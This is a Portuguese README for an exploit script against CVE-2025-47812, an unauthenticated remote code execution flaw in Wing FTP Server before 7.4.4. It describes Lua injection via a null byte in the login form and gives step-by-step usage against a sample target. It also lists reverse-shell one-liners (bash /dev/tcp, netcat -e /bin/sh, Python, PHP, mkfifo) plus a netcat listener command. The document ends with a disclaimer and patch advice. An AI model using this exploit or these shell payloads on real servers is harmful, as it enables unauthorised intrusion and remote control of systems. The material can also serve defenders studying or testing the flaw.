
Exploit de execução remota de código não autenticado para Wing FTP Server < 7.4.4, permitindo execução de comandos e reverse shells via injeção de Lua em arquivos de sessão.
CVE-2025-47812 - Execução Remota de Código (RCE) no Wing FTP Server
===========================================================
Autor: blindma1den
Data: Julho de 2025
Tipo de Exploit: Execução Remota de Código (Não Autenticado)
Alvo: Wing FTP Server < 7.4.4
Pontuação CVSS: 10.0 (Crítico)
Este script explora o CVE-2025-47812, uma vulnerabilidade crítica na interface web do Wing FTP Server que permite a atacantes remotos executar comandos arbitrários do sistema ou abrir uma reverse shell sem autenticação.
A falha é causada pelo tratamento inadequado de bytes nulos (%00)
no formulário de login (/loginok.html). Isso permite injeção de
código Lua em arquivos de sessão, que posteriormente são avaliados
quando endpoints como /dir.html são acessados.
Descrição NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
whoami, uname -a)Instale as dependências:
pip install requests
Execute o script:
python3 wingftp_rce_exploit.py
Você será solicitado a fornecer:
[1] EXECUTAR COMANDO:
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 1
Command to execute (default: whoami): whoami
[2] REVERSE SHELL:
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 2
Reverse shell IP address: 192.168.1.100
Reverse shell port: 4444
Inicie seu listener antes de acionar a shell:
nc -lvnp 4444
Bash: bash -i >& /dev/tcp/IP/PORT 0>&1
Python3: python3 -c 'import socket,subprocess,os; ...'
Netcat: nc IP PORT -e /bin/sh
PHP: php -r '$sock=fsockopen("IP",PORT); ...'
FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...
Este código é apenas para fins educacionais. NÃO utilize este exploit contra sistemas que você não possui ou para os quais não tenha autorização explícita para testar. O uso não autorizado é ilegal e antiético.
Atualize seus sistemas imediatamente. O Wing FTP Server 7.4.4 corrige esta vulnerabilidade.
Feliz hacking!